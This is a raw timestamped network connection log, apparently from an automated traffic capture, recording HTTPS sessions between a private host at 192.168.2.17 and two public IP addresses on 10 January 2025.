                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.676553965 CET49714443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.676567078 CET44349714104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.676676989 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.676686049 CET49714443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.676755905 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.676769018 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.676816940 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.676860094 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.676873922 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.676882982 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.676927090 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.676934004 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.676973104 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.677018881 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.677026987 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.677201033 CET44349714104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.677253962 CET44349714104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.677265882 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.677304983 CET44349714104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.677313089 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.677318096 CET49714443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.677330017 CET44349714104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.677335978 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.677350044 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.677378893 CET49714443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.677381039 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.677390099 CET44349714104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.677401066 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.677407980 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.677458048 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.677464008 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.678016901 CET44349714104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.678041935 CET44349714104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.678076982 CET49714443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.678088903 CET44349714104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.678265095 CET49714443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.678327084 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.678365946 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.678384066 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.678390026 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.678436041 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.678469896 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.678477049 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.678491116 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.678529978 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.678535938 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.678580999 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.679136038 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.679203033 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.679260015 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.679266930 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.699297905 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.699495077 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.699522972 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.699549913 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.699579954 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.699592113 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.699615002 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.699645996 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.700103998 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.700141907 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.700155020 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.700191021 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.700223923 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.700237989 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.700690985 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.701000929 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.701301098 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.701328039 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.701354027 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.701355934 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.701369047 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.701406002 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.701425076 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.701471090 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.701483011 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.702287912 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.702313900 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.702338934 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.702351093 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.702414036 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.702425003 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.704946041 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.704966068 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.704996109 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.705010891 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.705079079 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.721344948 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.721349955 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.721364021 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.722604036 CET44349714104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.725258112 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.725456953 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.725572109 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.725639105 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.725665092 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.725718021 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.725724936 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.725843906 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.725917101 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.725974083 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.725980043 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.726026058 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.726417065 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.726825953 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.726855993 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.726881027 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.726886034 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.726922989 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.726937056 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.726942062 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.726974964 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.726986885 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.726990938 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.727029085 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.727672100 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.727804899 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.727838039 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.727868080 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.727891922 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.727899075 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.727921963 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.728735924 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.728790998 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.728796959 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.729300022 CET44349722172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.729583979 CET49722443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.729594946 CET44349722172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.730287075 CET44349722172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.730689049 CET49722443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.730781078 CET44349722172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.730864048 CET49722443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.760114908 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.760164022 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.760200977 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.760224104 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.760235071 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.760248899 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.760255098 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.760301113 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.760317087 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.760370970 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.760377884 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.760436058 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.760451078 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.760715008 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.760765076 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.760767937 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.760781050 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.760809898 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.760809898 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.760867119 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.760879040 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.760930061 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.761193037 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.761233091 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.761260033 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.761271954 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.761298895 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.761301994 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.761343002 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.761351109 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.761368990 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.761395931 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.761395931 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.761420965 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.762022972 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.762089968 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.762115955 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.762180090 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.762281895 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.762324095 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.762331963 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.762346029 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.762432098 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.762445927 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.762460947 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.762487888 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.762491941 CET44349714104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.762566090 CET44349714104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.762629032 CET44349714104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.762684107 CET44349714104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.762731075 CET49714443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.762731075 CET49714443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.762733936 CET44349714104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.762758017 CET44349714104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.762775898 CET49714443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.762895107 CET44349714104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.762964010 CET44349714104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.763020992 CET44349714104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.763025999 CET49714443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.763040066 CET44349714104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.763092995 CET49714443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.763106108 CET44349714104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.763144016 CET44349714104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.763164043 CET49714443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.763238907 CET49714443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.763257027 CET44349714104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.763286114 CET49714443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.763286114 CET49714443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.763350010 CET49714443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.763585091 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.763659954 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.763699055 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.763711929 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.763740063 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.763789892 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.763789892 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.763804913 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.763874054 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.763915062 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.763923883 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.763966084 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.764086962 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.764137983 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.764139891 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.764149904 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.764182091 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.764195919 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.764214039 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.765060902 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.765104055 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.765131950 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.765141010 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.765156031 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.765156031 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.765213013 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.765221119 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.765285969 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.765907049 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.765950918 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.765979052 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.765988111 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.766002893 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.766033888 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.769335985 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.769345045 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.771332026 CET44349722172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.774899960 CET49725443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.774961948 CET44349725104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.775059938 CET49725443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.775301933 CET49725443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.775345087 CET44349725104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.791707039 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.791754007 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.791778088 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.791809082 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.791841984 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.791848898 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.791862965 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.791876078 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.791893005 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.791903973 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.792216063 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.792278051 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.792287111 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.792331934 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.792474985 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.792538881 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.792622089 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.792646885 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.792668104 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.792674065 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.792697906 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.793056965 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.793107986 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.793112993 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.793133974 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.793184996 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.793190002 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.793250084 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.793277025 CET44349718104.22.72.81192.168.2.17
